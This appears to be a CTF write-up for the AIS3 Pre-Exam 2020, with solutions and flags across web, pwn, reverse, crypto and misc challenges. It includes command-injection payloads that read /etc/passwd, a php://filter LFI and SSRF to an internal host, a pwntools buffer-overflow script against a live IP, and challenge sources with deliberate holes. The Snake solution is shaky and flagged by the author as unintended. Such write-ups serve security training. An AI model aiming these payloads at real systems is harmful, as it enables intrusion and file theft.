---
title: AIS3 Pre-Exam 2020 WriteUp
tags: AIS3,Pre-Exam,CTF,2020WriteUp
---

# AIS3 Pre-Exam 2020 WriteUp

## 🌐Web

### 🐘Elephant
:::success
Challenge description:
Do elephants love cookies?
https://elephant.ais3.org/
IMPORTANT
- There’s a hint in the webpage
:::

Solution:
1. Get the cookie
2. Base64-decode it
3. Fix the incorrect parameter in the serialized data
4. Base64-encode it
5. Use a cookie editor to set the cookie to the newly encoded value
6. Press F5

Flag:
### <span style="color:#ffffff">AIS3{0nly_3l3ph4n75_5h0uld_0wn_1v0ry}</span>

---

### 🐿️Squirrel
:::success
Challenge description:
Hack those creepy rats.
https://squirrel.ais3.org/
:::

Solution:
After opening the page, view the source code and find this piece of JS
```javascript=
const squirrelFile = '/etc/passwd';
fetch('api.php?get=' + encodeURIComponent(squirrelFile))
    .then(res => res.json())
    .then(data => {
        if ('error' in data) {
            throw data.error;
        }
        data.output.split('\n')
            .map(line => line.split(':')[0].trim())
            .filter(name => name.length)
            .forEach(name => new Squirrel(name).update());
    })
    .catch(err => {
        console.log(err);
        alert('Something went wrong! Please report this to the author!');
    });
```
GET ```/api.php?get=``` returns a piece of JSON
```json=
{"error":"empty file path"}
```
Next, GET ```?get=/etc/passwd``` returns the contents of /etc/passwd
```json=
{"output":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List
Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n"}
```
This suggests either command injection or local file inclusion, so keep testing with ```?get=';ls'```
Response:
```json=
{"output":"api.php\ncss\nindex.html\njs\n"}
```
This confirms command injection (CMDi), so try to find where the flag is
GET ```?get=';ls /'```
Response:
```json=
{"output":"5qu1rr3l_15_4_k1nd_0f_b16_r47.txt\nbin\nboot\ndev\netc\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n"}
```
There is a suspicious file, which is presumably the flag; try to cat it
GET ```?get=';cat /5qu1rr3l_15_4_k1nd_0f_b16_r47.txt'```

Flag:
### <span style="color:#ffffff">AIS3{5qu1rr3l_15_4_k1nd_0f_b16_r47}</span>

---

### 🦈Shark
:::success
Challenge description:
Let’s dive deep again this year.
https://shark.ais3.org/
:::

The page contains a hyperlink; clicking it shows the hint
```
Please find the other server in the internal network! (flag is on that server)
GET http://some-internal-server/flag
```
The URL shows the hint is fetched with GET /?path=hint.txt, which suggests an LFI problem
Trying GET /?path=index.php successfully shows the source code
```php=
<?php
    if ($path = @$_GET['path']) {
        if (preg_match('/^(\.|\/)/', $path)) {
            // disallow /path/like/this and ../this
            die('<pre>[forbidden]</pre>');
        }
        $content = @file_get_contents($path, FALSE, NULL, 0, 1000);
        die('<pre>' . ($content ? htmlentities($content) : '[empty]') .
            '</pre>');
    }
?><!DOCTYPE html>
<head>
    <title>🦈🦈🦈</title>
    <meta charset="utf-8">
</head>
<body>
    <h1>🦈🦈🦈</h1>
    <a href="?path=hint.txt">Shark never cries?</a>
</body>
```
The hint says to find another machine on the internal network and get the flag from it, so try reading this machine's ```/etc/hosts```
The source code shows that path is checked with a regular expression, so it has to be bypassed
Try bypassing it with Base64
Payload:```?path=php://filter/convert.base64-encode/resource=/etc/hosts```
Response:
```
MTI3LjAuMC4xCWxvY2FsaG9zdAo6OjEJbG9jYWxob3N0IGlwNi1sb2NhbGhvc3QgaXA2LWxvb3BiYWNrCmZlMDA6OjAJaXA2LWxvY2FsbmV0CmZmMDA6OjAJaXA2LW1jYXN0cHJlZml4CmZmMDI6OjEJaXA2LWFsbG5vZGVzCmZmMDI6OjIJaXA2LWFsbHJvdXRlcnMKMTcyLjIyLjAuMwkwMmIyMzQ2NzQ4NWUK
```
Base64 Decode:
```
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.22.0.3 02b23467485e
```
The host is 172.22.0.3, so check whether anything is at .2 and .4
There is something at .2
```htmlmixed=
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
```
Try to find the flag
Payload:```?path=http://172.22.0.2/flag```

Flag:
### <span style="color:#ffffff">AIS3{5h4rk5_d0n’7_5w1m_b4ckw4rd5}</span>

---

### 🐍Snake
:::success
Challenge description:
How to read that flag?
https://snake.ais3.org/
Source Code:
```python=
from flask import Flask, Response, request
import pickle, base64, traceback

Response.default_mimetype = 'text/plain'

app = Flask(__name__)

@app.route("/")
def index():
    data = request.values.get('data')

    if data is not None:
        try:
            data = base64.b64decode(data)
            data = pickle.loads(data)

            if data and not data:
                return open('/flag').read()

            return str(data)
        except:
            return traceback.format_exc()

    return open(__file__).read()
```
:::
:::danger
This does not appear to be the intended solution
:::

Solution:
Python Serialization and Base64 code
```python=
import pickle
import base64

if __name__ == '__main__':
    # Pickle a plain string, then Base64-encode it for the ?data= parameter
    pickled = pickle.dumps("print('open('/flag').read()')")
    print(base64.b64encode(pickled))
```
Quest Python Test Code
```python=
import pickle
import base64
import os

data3 = 'success'
data2 = 'gASVCQAAAAAAAACMBWRhdGEzlC4='
data = 'gASVCQAAAAAAAACMBWRhdGEzlC4='  # Base64 of the pickled string 'data3'
data = base64.b64decode(data)
print(data)
data = pickle.loads(data)
print(data)
# Same condition as the challenge's index()
if data and not data:
    print('true')
else:
    print('false')
print(data)
print(str(print((data))))
```
Payload
```python
?data=gASVIQAAAAAAAACMHXByaW50KCdvcGVuKCcvZmxhZycpLnJlYWQoKScplC4=
```

Flag:
### <span style="color:#ffffff">AIS3{7h3_5n4k3_w1ll_4lw4y5_b173_b4ck.}</span>

---

### 🦏Rhino
:::success
Challenge description:
Do you know why is this challenge called Rhino?
https://rhino.ais3.org/

/package.json
```json=
// 20200612172354
// https://rhino.ais3.org/package.json

{
  "name": "app",
  "version": "1.0.0",
  "description": "",
  "scripts": {
    "start": "node chill.js",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "djosix",
  "license": "ISC",
  "dependencies": {
    "cookie-session": "^1.4.0",
    "express": "^4.17.1"
  }
}
```
/chill.js
```javascript=
const express = require('express');
const session = require('cookie-session');

let app = express();

app.use(session({
    secret: "I'm watching you."
}));

app.use('/', express.static('./'));

app.get('/flag.txt', (req, res) => {
    res.setHeader('Content-Type', 'text/plain');

    let n = req.session.magic;

    if (n && (n + 420) === 420)
        res.sendFile('/flag');
    else
        res.send('you are a sad person too');
});

app.get('*', function(req, res){
    res.status(404).sendFile('404.html', { root: __dirname });
});

app.listen(process.env.PORT, '0.0.0.0');
```
:::

---

### 🦉Owl
:::success
Challenge description:
Flag is inside the database.
https://turtowl.ais3.org/
**IMPORTANT**
- There's a hint in the webpage
- This is a hybrid challenge with Turtle in Crypto

/?source
```php=
<?php

if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    exit;
}

// Settings
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
date_default_timezone_set('Asia/Taipei');
session_start();

// CSRF
if (!isset($_SESSION['csrf_key']))
    $_SESSION['csrf_key'] = md5(rand() * rand());
require_once('csrf.php');
$csrf = new Csrf($_SESSION['csrf_key']);

if ($action = @$_GET['action']) {
    function redirect($path = '/', $message = null) {
        $alert = $message ? 'alert(' . json_encode($message) .
            ')' : '';
        $path = json_encode($path);
        die("<script>$alert; document.location.replace($path);</script>");
    }

    if ($action === 'logout') {
        unset($_SESSION['user']);
        redirect('/');
    }
    else if ($action === 'login') {
        // Validate CSRF token
        $token = @$_POST['csrf_token'];
        if (!$token || !$csrf->validate($token)) {
            redirect('/', 'invalid csrf_token');
        }

        // Check if username and password are given
        $username = @$_POST['username'];
        $password = @$_POST['password'];
        if (!$username || !$password) {
            redirect('/', 'username and password should not be empty');
        }

        // Get rid of sqlmap kiddies
        if (stripos($_SERVER['HTTP_USER_AGENT'], 'sqlmap') !== false) {
            redirect('/', "sqlmap is child's play");
        }

        // Get rid of you
        $bad = [' ', '/*', '*/', 'select', 'union', 'or', 'and', 'where', 'from', '--'];
        $username = str_ireplace($bad, '', $username);
        $username = str_ireplace($bad, '', $username);

        // Auth
        $hash = md5($password);
        $row = (new SQLite3('/db.sqlite3'))
            ->querySingle("SELECT * FROM users WHERE username = '$username' AND password = '$hash'", true);
        if (!$row) {
            redirect('/', 'login failed');
        }

        $_SESSION['user'] = $row['username'];
        redirect('/');
    }
    else {
        redirect('/', "unknown action: $action");
    }
}

$user = @$_SESSION['user'];

?><!DOCTYPE html>
<head>
    <title>🦉🦉🦉🦉</title>
    <meta charset='utf-8'>
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
    <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>
    <?php if (!$user): ?>
        <div id="login">
            <h3 class="text-center text-white pt-5">GUESS THE STUPID USERNAME / PASSWORD</h3>
            <div class="container">
                <div id="login-row" class="row justify-content-center align-items-center">
                    <div id="login-column" class="col-md-6">
                        <div id="login-box" class="col-md-12">
                            <form id="login-form" class="form" action="?action=login" method="post">
                                <input type="hidden"
                                    name="csrf_token" value="<?= htmlentities($csrf->generate()) ?>">
                                <h3 class="text-center text-info">🦉: "Login to see cool things!"</h3>
                                <div class="form-group">
                                    <label for="name" class="text-info">Username:</label><br>
                                    <input type="text" name="username" id="username" class="form-control"><br>
                                    <label for="name" class="text-info">Password:</label><br>
                                    <input type="text" name="password" id="password" class="form-control"><br>
                                </div>
                                <div class="form-group">
                                    <input type="submit" name="submit" class="btn btn-info btn-md" value="Login">
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    <?php else: ?>
        <h3 class="text-center text-white pt-5"><a style="color: white" href="/?source">SHOW HINT</a></h3>
        <div class="container">
            <div class="row justify-content-center align-items-center">
                <div class="col-md-6">
                    <div class="col-md-12">
                        <h3 class="text-center text-info">Nothing</h3>
                        Hello, <b><?= htmlentities($user) ?></b>, nothing here.
                        <a href="?action=logout">Logout!</a>
                    </div>
                </div>
            </div>
        </div>
    <?php endif ?>
</body>
```
:::

---

## 💥 Pwn

### 👻 BOF
:::success
Challenge description:
That is easy-peasy challenge and even my grandma can do.
nc 60.250.197.227 10000
Challenge environment: Ubuntu 18.04
Files:
[bof-767fdf896cf9838c0294db24eaa1271ebf15a6e638a873e94ab9682ef28464b4](https://drive.google.com/file/d/1Yt25hbllbcHq3-R6POqEvWRwdC7yq1ek/view?usp=sharing)
:::

Solution:
```python=
from pwn import *

context.log_level = 'debug'
r = remote('60.250.197.227', '10000')

# Padding of 0x30 + 8 bytes, followed by the address 0x400688
payload = b'a' * (0x30 + 8) + p64(0x400688)
r.recvline()
r.sendline(payload)

r.interactive()
```

Flag:
### <span style="color:#ffffff">AIS3{OLd_5ChOOl_tr1ck_T0_m4Ke_s7aCk_A116nmeNt}</span>

---

### 📃 Nonsense
:::success
Challenge description:
Welcome to Rick and Morty’s crazy world.
Say something!
Rick’s stupid nonsense catchphrase is “wubba lubba dub dub”.
nc 60.250.197.227 10001
Challenge environment: Ubuntu 18.04
Files:
[nonsense-8ccbca2ca7f8825c843596a09c0806275a5b3fdf1c6c570bc0276fb0afc9210c](https://drive.google.com/file/d/1vHYdgI4I1X2y-Tnzbbxb3NnssW8CIqq3/view?usp=sharing)
:::

---

### 🔫 Portal gun
:::success
Challenge description:
The Portal Gun is a gadget that allows the user(s) to travel between different universes/dimensions/realities.
Try to get the shell and avoid the hook!
nc 60.250.197.227 10002
Challenge environment: Ubuntu 18.04
Files:
[hook.so-997c848132f9fae3a5ffdb0edf7c9071a0dcdebb99c116c5bd011efd28c942ae](https://drive.google.com/file/d/1LLTs6n2BVkBN6KiG0dB_ai0k9tlO2vCe/view?usp=sharing)
[portal_gun-43fcd0f6ae670ddb11a66bbfbca721410941ee30a5d1d802a6f509bcf7a765ac](https://drive.google.com/file/d/1sx55VZwfneXlnw1Jf2VbSdkW5NFacdMb/view?usp=sharing)
[libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d](https://drive.google.com/file/d/1sBRdoSBxzln-GAw5PBSHvJh76CQzkN76/view?usp=sharing)
:::

---

### 🏫 Morty school
:::success
Challenge description:
Welcome to Morty school ^_^
We need you to teach Morty. And then you can get the shell!
nc 60.250.197.227 10003
Challenge environment: Ubuntu 18.04
Files:
[morty_school-d97056f03b991d718b35ef47fcfcaeb15f971b60b58d0eb0fcd8dcf3a3a11a99](https://drive.google.com/file/d/1E7Cv1OwAvCI2lPIYzo5A-TTV1hX34eb0/view?usp=sharing)
[libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d](https://drive.google.com/file/d/1sBRdoSBxzln-GAw5PBSHvJh76CQzkN76/view?usp=sharing)
:::

---

### 🔮Death crystal
:::success
Challenge description:
Death Crystals are crystals found on Forbodulon Prime that allow those who wield it to foresee their death in multiple possible future scenarios.
Before you died, you can see the message I left.
nc 60.250.197.227 10004
Challenge environment: Ubuntu 18.04
Files:
[death_crystal-5c5baf0fb1ef4690eb472dc579403af6248be7a6815a89906b2c22ce55d73529](https://drive.google.com/file/d/1eR_wiZAKBI_ZdOIvVUJBrWItKdy9z__A/view?usp=sharing)
:::

---

### 📦Meeseeks box
:::success
Challenge description:
The Mr. Meeseeks Box is a gadget that creates a Mr. Meeseeks for the purpose of completing one given objective.
Just keep your requests simple. They are not Gods.
nc 60.250.197.227 10005
Challenge environment: Ubuntu 18.04
Files:
[meeseeks_box-46937361847a6ed6df9ee20eea7eb59b70db5d9779ca2b94e481bc57fd130873](https://drive.google.com/file/d/1GGkKUbjpchOD37nvShvzEigw-n7rcbbY/view?usp=sharing)
[libc.so.6-cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d](https://drive.google.com/file/d/1sBRdoSBxzln-GAw5PBSHvJh76CQzkN76/view?usp=sharing)
:::

---

## ♻️Reverse

### 🍍TsaiBro
:::success
Challenge description:
Very good.... are you brain-damaged.... how dare you talk about Sword Art Online like that....... I won't let you off even if I die
I.. will.. kill... you..
![](https://i.imgur.com/wKDoZs7.gif)
author: terrynini
Files:
[TsaiBro](https://drive.google.com/file/d/16LfYgKEg017QKdbaQb6lbxPPi_5WnBDO/view?usp=sharing)
[TsaiBroSaid](https://drive.google.com/file/d/1_xdHlOqWxT2exa4XvO5YEum8z0fER_gc/view?usp=sharing)
:::

Solution:
There are two ways to solve it
1. Disassemble with IDA Pro, work out the rule from the code, then write code to list the result directly
2. Brute-force the pattern, build a table, then match the symbols one by one

Cipher table:
```
11 5   21 W   31 a   41 S   51 K   61 e   71 i   81 C
12 6   22 X   32 b   42 T   52 L   62 f   72 j   82 D
13 7   23 Y   33 c   43 U   53 M   63 g   73 k   83 E
14 8   24 0   34 d   44 V   54 N   64 h   74 l   84 F
15 9   25 y   35 m   45 G   55 u   65 q   75 O   85 1
16 {   26 z   36 n   46 H   56 v   66 r   76 P   86 2
17 }   27 A   37 o   47 I   57 w   67 s   77 Q   87 3
18 _   28 B   38 p   48 J   58 x   68 t   78 R   88 4
```
Ciphertext:
```
Terry...逆逆...沒有...學問...單純...分享...個人...生活...感觸...
發財..發財.......發財....發財.......發財....發財.發財........發財.......發財.發財......發財..發財.....發財........發財.......發財......發財.......發財.發財........發財..發財.....發財..發財....發財.....發財.....發財.發財........發財......發財....發財........發財........發財.....發財......發財......發財.發財.發財........發財......發財.......發財........發財........發財.....發財.......發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財...發財...發財......發財....發財........發財........發財.......發財....發財.......發財....發財........發財.......發財...發財......發財......發財...發財........發財.......發財.發財........發財...發財..發財......發財.發財......發財..發財..發財....發財......發財......發財........發財.......發財.發財........發財...發財..發財.....發財.....發財.發財...發財.發財........發財.......發財.發財......發財........發財......發財.......發財.發財........發財...發財.....發財..發財....發財......發財......發財........發財.......發財.發財........發財.......發財....發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財.......發財...發財......發財......發財...發財.發財........發財.發財...發財......發財....發財........發財.....發財......發財.......發財.發財........發財......發財........發財........發財.....發財...發財.....發財........發財.......發財.發財.......
```

Flag:
### <span style="color:#ffffff">AIS3{y3s_y0u_h4ve_s4w_7h1s_ch4ll3ng3_bef0r3_bu7_its_m0r3_looooooooooooooooooong_7h1s_t1m3}</span>

---

### 🎹Fallen Beat
:::success
Challenge description:
CTF player, I want to challenge you, I'm gonna challenge you!!
ZR here is my roommate and lab mate.
He has already passed gold-frame 暴龍天. He is a knob person,
unlike you, who just bangs on a keyboard,
so I am going to test what level you are at.
Let's settle this with ZR's freshman-year project!!
Get a Full Combo to impress me!!
author: terryninien
Files:
[Fallen_Beat.zip](https://drive.google.com/file/d/1kn5hq1zNFZL6n8A30avGzPU0rM8k0kKP/view?usp=sharing)
:::

Solution:
1. Decompile with radare2
2. Find the enflag array
3. XOR it with the hell.txt chart to get the flag

*Note: drop the first two lines of the hell.txt chart

Code:
```javascript=
var fs = require("fs");
// hell.txt chart with its first two lines already removed, one number per line
var cache = fs.readFileSync("hell.txt", "utf8").split("\n").map(v => parseInt(v, 10));
var enflag = [89, 74, 75, 43, 126, 69, 120, 109, 68, 109, 109, 97, 73, 110, 45, 113, 102, 64, 121, 47, 111, 119, 111, 71, 114, 125, 68, 105, 127, 124, 94, 103, 46, 107, 97, 104];
// XOR every chart value into the enflag entry at index i mod enflag.length
for (var i = 0; i < cache.length; i++) {
    var n = i % enflag.length;
    enflag[n] ^= cache[i];
}
console.log(enflag.map(v => String.fromCharCode(v)).join(""));
```

Flag:
### <span style="color:#ffffff">AIS3{Wow_how_m4ny_h4nds_do_you_h4ve}</span>

---

### 🧠 Stand up!Brain
:::success
Challenge description:
It's time for Brain tell me a joke again
This time it's your turn to tell a joke
![](https://i.imgur.com/NBW5qTC.png =500x500)
author: terrynini
Files:
[joke](https://drive.google.com/file/d/1gre6j8LYsE0ZtvjU9FYoJGqPsye6BpwB/view?usp=sharing)
:::

Solution:
1. Run `strings joke` in a Linux terminal
2. Look at the strings
```
-------------------------------------------------------------------[>[-]<[-]]>[>--------------------------------------------------------[>[-]<[-]]>[>-------------------------------------------------------[>[-]<[-]]>[>------------------------------------------------------[>[-]<[-]]>[>---------------------------------------------------[>[-]<[-]]>[>---------------------------------[>[-]<[-]]>[>>----[---->+<]>++.++++++++.++++++++++.>-[----->+<]>.+[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]]
```
3. Encode `AIS3{` in Brainfuck
```
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.
```
4. Replace the leading part with it, giving
```
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>-----.++++++++.++++++++++.<+++++++++++++++++++++.>>+++++++++++++++++++++++.[--->++<]>+++.>-[--->+<]>-.[---->+++++<]>-.[-->+<]>---.[--->++<]>---.++[->+++<]>.+[-->+<]>+.[--->++<]>---.++[->+++<]>.+++.[--->+<]>----.[-->+<]>-----.[->++<]>+.-[---->+++<]>.--------.>-[--->+<]>.-[----->+<]>-.++++++++.--[----->+++<]>.+++.[--->+<]>-.-[-->+<]>---.++[--->+++++<]>.++++++++++++++.+++[->+++++<]>.[----->+<]>++.>-[----->+<]>.---[->++<]>-.++++++.[--->+<]>+++.+++.[-]]]]]]]
```

Flag:
### <span style="color:#ffffff">AIS3{Th1s_1s_br4iNFUCK_bu7_m0r3_ez}</span>

---

### 🍹Long Island Iced Tea
:::success
Challenge description:
Long·Island·Iced·Tea my·absolute·favorite
Long·Island·Iced·Tea such·a·refreshing·taste
dong dong dong kiang dong dong dong kiang dong dong dong kiang
I am really so kiang
author: terrynini
Files:
[Long_Island_Iced_Tea](https://drive.google.com/file/d/10Y7q5JH5_gU2ZdPstOIpS2kJn76ccsYC/view?usp=sharing)
[flag](https://drive.google.com/file/d/1d3XtGbBiY_LdXrQ6OPG5bfSfOxu4en_I/view?usp=sharing)
:::

---

### 🌹La vie en rose
:::success
Challenge description:
![](https://i.imgur.com/4Tu5Jvb.jpg)
author: terrynini
Files:
[La_vie_en_rose.exe](https://drive.google.com/file/d/1qQ5imPkqwNRlt1HQfmwn3N27LoSuKjpm/view?usp=sharing)
:::

---

### 🐉Uroboros
:::success
Challenge description:
Hello there, big brother Edward. I really didn't expect you to make it to the 25th floor!
But this is as far as you go.
From here on, I,
Anti-Gravity Three-Headed Chain Connie·Liberation·Crimson,
will be your opponent!
![](https://i.imgur.com/3haxMga.png)
author: terrynini
Files:
[Uroboros](https://drive.google.com/file/d/18BSyZ0tWJ1QPnhoiGRHij8xXdTQJAT0U/view?usp=sharing)
:::

---

## 🙊Crypto

### 🦕Brontosauru
:::success
Challenge description:
Brontosaurus peek at last year’s problems with a long neck and picked up “KcufsJ”.
Files:
[KcufsJ](https://drive.google.com/file/d/1Iet8O_dDwt1ygqZ_F2jXG_7JkBofVF5-/view?usp=sharing)
:::

Solution:
Reverse the string, then run it in the F12 developer tools

Flag:
### <span style="color:#ffffff">AIS3{Br0n7Os4uru5_ch3at_3asi1Y}</span>

---

### 🦖T-Rex
:::success
Challenge description:
Tyrannosaurus-rex is an nihilist.
Files:
[prob](https://drive.google.com/file/d/17giKiJcFrW1UNuK8Mz5CEU64nTUEeQ12/view?usp=sharing)
:::

Solution:
There are two ways to solve it
1. Write code to list it out
2. Match the symbols one by one

Cipher table:
```
!! V   @! F   #! Y   $!     %! 6   &! 1
!@ S   @@ 0   #@ M   $@     %@ 9   &@ L
!# I   @# W   ## H   $#     %# 4   &# Q
!$ K   @$ G   #$ B   $$     %$ T   &$ A
!% E   @% 3   #% C   $%     %% P   &% N
!& U   @& Z   #& 8   $&     %& D   && O
```
Ciphertext:
```
&$ !# $# @% {...}
```

Flag:
### <span style="color:#ffffff">AIS3{TYR4NN0S4URU5_R3X_GIV3_Y0U_SOMETHING_RANDOM_5TD6XQIVN3H7EUF8ODET4T3H907HUC69L6LTSH4KN3EURN49BIOUY6HBFCVJRZP0O83FWM0Z59IISJ5A2VFQG1QJ0LECYLA0A1UYIHTIIT1IWH0JX4T3ZJ1KSBRM9GED63CJVBQHQORVEJZELUJW5UG78B9PP1SIRM1IF500H52USDPIVRK7VGZULBO3RRE1OLNGNALX}</span>

---

### 🐡 Blowfish
:::success
Challenge description:
Don’t poke the puffer, it is poisonous.
nc 60.250.197.227 12001
Files:
[prob.py](https://drive.google.com/file/d/1O7Z_KQPeOZwqc9Jedk6hi6wBHfPoSdtD/view?usp=sharing)
[user.pickle](https://drive.google.com/file/d/1HcThNkHu3LRfOuWuTSS-TS7UEpaAyCSE/view?usp=sharing)
:::

---

### 🐙 Octopus
:::success
Challenge description:
BB84 quantum key distribution has 8 main directions, just like a cute octopus A __ A.
Files:
[prob.py](https://drive.google.com/file/d/1QQrcGTj3f5K1M2PAt-bsFmhhLXBlJJ4b/view?usp=sharing)
[output](https://drive.google.com/file/d/1ThoYj8JCxCYht9XINRBkZXUKxb15JRPh/view?usp=sharing)
:::

---

### 🐪Camel
:::success
Challenge description:
Wow!! There is an elliptic curve on the camel.
Files:
[prob.sage](https://drive.google.com/file/d/1LHWrLNpxwwE8UUBKWHzYFxQxV9iVIUF-/view?usp=sharing)
:::

---

### 🐢Turtle
:::success
Challenge description:
Try to decrypt the secret!
https://turtowl.ais3.org/csrf.php?source

/csrf.php?source
```php
<?php

class Csrf {
    private $secret, $key, $size;

    function __construct($key) {
        $this->key = $key;
        $this->secret = file_get_contents('/turtle.flag');
        $this->size = openssl_cipher_iv_length('aes-256-cbc');
    }

    function generate() {
        $iv = openssl_random_pseudo_bytes($this->size);
        $cipher = openssl_encrypt($this->secret, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv);
        $token = base64_encode($iv .
            $cipher);
        return $token;
    }

    function validate($token) {
        $bytes = base64_decode($token);
        $iv = substr($bytes, 0, $this->size); // extract IV
        $cipher = substr($bytes, $this->size); // extract cipher
        $secret = openssl_decrypt($cipher, 'aes-256-cbc', $this->key, OPENSSL_RAW_DATA, $iv);
        if ($secret === false) throw new Exception('token decryption failed');
        return $secret === $this->secret;
    }
}

if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) { // called directly
    if (isset($_GET['source'])) {
        highlight_file(__FILE__);
    }
    exit;
}
```
:::

---

## 🐧Misc

### 💤Piquero
Challenge description:
:::success
I can’t see the flag. Where is it?
Files:
[Piquero_99c9aa83fe492df8d52229017d4dca92297c9aeb.jpg](https://drive.google.com/file/d/1mqoDQhHYXNlOwrypXyqhF8Wff6xbKHNe/view?usp=sharing)
![](https://i.imgur.com/pJsBfG3.jpg)
:::

Solution:
Cross-check against an [online tool](https://www.dcode.fr/braille-alphabet)
Watch out for some of the special symbols

Flag:
### <span style="color:#ffffff">AIS3{I_feel_sleepy_Good_Night!!!}</span>

---

### 🐥Karuego
:::success
Challenge description:
Students who fail to summon will be dropped out.
Files:
[Karuego_0d9f4a9262326e0150272debfd4418aaa600ffe4.png](https://drive.google.com/file/d/1M1fHQek1wvzoN_zlL2khf8g_7dqdOZtr/view?usp=sharing)
:::

Solution:
binwalk shows that the file contains a zip archive and that it is encrypted
Use dd to extract the hidden zip
Use fcrackzip to brute-force the password
The flag is then visible on the image inside

Flag:
### <span style="color:#ffffff">AIS3{Ar3_y0u_r34l1y_r34dy_t0_sumnn0n_4_D3m0n?}</span>

---

### 🌱Soy
:::success
Challenge description:
Here is your flag. Oops, my bad.
Files:
[Soy_b692c44dd2a32b30eee8a9315091d79f7dd8c8a8.png](https://drive.google.com/file/d/1Stc9XrOMHD-bfRDfFMjB4F_sZEyOAPyN/view?usp=sharing)
![](https://i.imgur.com/mEb4gwg.png =700x500)
:::

Solution:
Use this [online tool](https://merricx.github.io/qrazybox/) to redraw the parts that are still readable
Then use Tools > Extract QR Information at the top right to force the information out

Flag:
### <span style="color:#ffffff">AIS3{H0w_c4n_y0u_f1nd_me?!?!?!!}</span>

---

### 👑Saburo
:::success
Challenge description:
Spell you flag and fight with me.
PS.
flag is printable characters with AIS3{…}
nc 60.250.197.227 11001
:::

Solution:
Write code to brute-force it

Flag:
### <span style="color:#ffffff">AIS3{A1r1ght_U_4r3_my_3n3nnies}</span>

---

### 👿Shichirou
:::success
Challenge description:
Don’t cheat!!! I’m watching you!!
nc 60.250.197.227 11000
Files:
[Shichirou_1869833657e9fef14ad2742e59bb96f4630db429.py](https://drive.google.com/file/d/1hDUlaWGPNC4HRY2_hD6MET0ShVgpslvS/view?usp=sharing)
:::

---

### 🧸Clara
:::success
Challenge description:
I did nothing special today. >_<
Files:
[Clara_62f0b78d6dea918a20ba2965e9103c5098307969.pcapng](https://drive.google.com/file/d/1tC9G8oMxqF3r9mjA9opnrW5a09YDGhvV/view?usp=sharing)
:::
:::success
:::spoiler Hint1
**Defender: Malware Detected !!**
WTF, someone is monitoring me ?!
There are several encrypted data sent, but they looks a little be weird ?
:::
:::success
:::spoiler Hint2
Keyword: malware, monitor, encrypted data
The two malicious conversations sent exactly the same things.
The connection between malware and C&C are broken one time.
:::
:::success
